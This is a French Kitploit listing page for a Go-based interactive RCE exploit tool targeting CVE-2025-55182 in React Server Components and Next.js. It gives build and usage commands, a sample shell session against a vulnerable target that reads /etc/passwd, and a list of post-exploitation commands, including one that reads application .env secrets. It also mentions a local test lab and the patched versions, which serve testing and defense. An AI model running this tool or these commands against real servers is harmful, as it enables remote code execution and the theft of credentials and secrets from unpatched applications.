Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Outil d'exploitation RCE ciblant CVE-2025-55182, une vulnérabilité critique dans React Server Components (RSC) affectant React 19.0.0 - 19.2.0 et les applications Next.js. | Kitploit
Outils/GitHubGitHub/yyax13/cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubyyax13/cve-2025-55182

CVE-2025-55182

Outil d'exploitation RCE ciblant CVE-2025-55182, une vulnérabilité critique dans React Server Components (RSC) affectant React 19.0.0 - 19.2.0 et les applications Next.js.

Voir le dépôt
12il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

👻 Exploit CVE-2025-55182 en Go

Outil interactif d'exploitation RCE pour CVE-2025-55182 (React Server Components)

GitHub Stars License Go

🎯 Qu'est-ce que c'est ?

CVE-2025-55182 est un outil d'exploitation RCE minimal et interactif ciblant CVE-2025-55182, une vulnérabilité critique dans les React Server Components (RSC) affectant React 19.0.0 - 19.2.0 et les applications Next.js.


📦 Installation

Prérequis

  • Go 1.18 ou supérieur
  • Une cible vulnérable exécutant React 19.0.0 - 19.2.0

Compilation depuis les sources

root@kitploit:~
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go

🚀 Utilisation

Utilisation de base

root@kitploit:~
./CVE-2025-55182

Session interactive

root@kitploit:~
_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
╲_   ___ ╲   ╲ ╱   ╱╲_   _____╱         ╲_____  ╲   _  ╲  ╲_____  ╲  │   ____╱          │   ____╱│   ____╱_   │╱  __  ╲ ╲_____  ╲ 
╱    ╲  ╲╱╲   Y   ╱  │    __)_   ______  ╱  ____╱  ╱_╲  ╲  ╱  ____╱  │____  ╲   ______  │____  ╲ │____  ╲ │   │>      <  ╱  ____╱ 
╲     ╲____╲     ╱   │        ╲ ╱_____╱ ╱       ╲  ╲_╱   ╲╱       ╲  ╱       ╲ ╱_____╱  ╱       ╲╱       ╲│   ╱   ──   ╲╱       ╲ 
 ╲______  ╱ ╲___╱   ╱_______  ╱         ╲_______ ╲_____  ╱╲_______ ╲╱______  ╱         ╱______  ╱______  ╱│___╲______  ╱╲_______ ╲
        ╲╱                  ╲╱                  ╲╱     ╲╱         ╲╱       ╲╱                 ╲╱       ╲╱            ╲╱         ╲╱  

    React2Shell RCE | CVE-2025-55182
    @hghost010

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Cible : localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] VULNÉRABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit

🎥 Démo

https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f


Versions concernées :

  • React 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Applications Next.js utilisant ces versions de React

Versions corrigées :

  • React 19.2.1+
  • Next.js avec dépendance React mise à jour

🧪 Configuration du laboratoire de test

Vous voulez tester en toute sécurité ? Configurez un environnement de laboratoire vulnérable :

root@kitploit:~
# Cloner l'application Next.js vulnérable
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# Installer et lancer
npm install --legacy-peer-deps
npm run dev

# Dans un autre terminal, lancer ghost-scanner
./CVE-2025-55182
# Entrer : localhost:3000

📚 Commandes courantes

root@kitploit:~
ghost@rce $ id                    # Vérifier les privilèges utilisateur
ghost@rce $ whoami                # Nom d'utilisateur actuel
ghost@rce $ pwd                   # Répertoire actuel
ghost@rce $ ls -la                # Lister les fichiers
ghost@rce $ cat /etc/passwd       # Lire des fichiers
ghost@rce $ uname -a              # Informations système
ghost@rce $ env                   # Variables d'environnement
ghost@rce $ ps aux                # Processus en cours
ghost@rce $ netstat -tulpn        # Connexions réseau
ghost@rce $ cat /app/.env         # Secrets de l'application

📊 Statistiques du dépôt

GitHub repo size GitHub last commit GitHub issues


🔗 Références

  • Détails de CVE-2025-55182
  • Avis de sécurité React
  • Avis de sécurité Next.js
  • PoC original par maple3142
  • Recherche Assetnote
  • Application de test vulnérable

💬 Communauté et support

  • 🐦 Twitter/X : @hghost010
  • 🐙 GitHub : Hghost0x00

Vous avez trouvé un bug ? Ouvrez une issue


⭐ Montrez votre soutien

Si cet outil vous a aidé :

  • ⭐ Mettez une étoile à ce dépôt
  • 💬 Partagez-le avec d'autres

📝 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.


Fabriqué avec 👻 par Hghost0x00
Bon hacking ⚡

Télécharger l’outil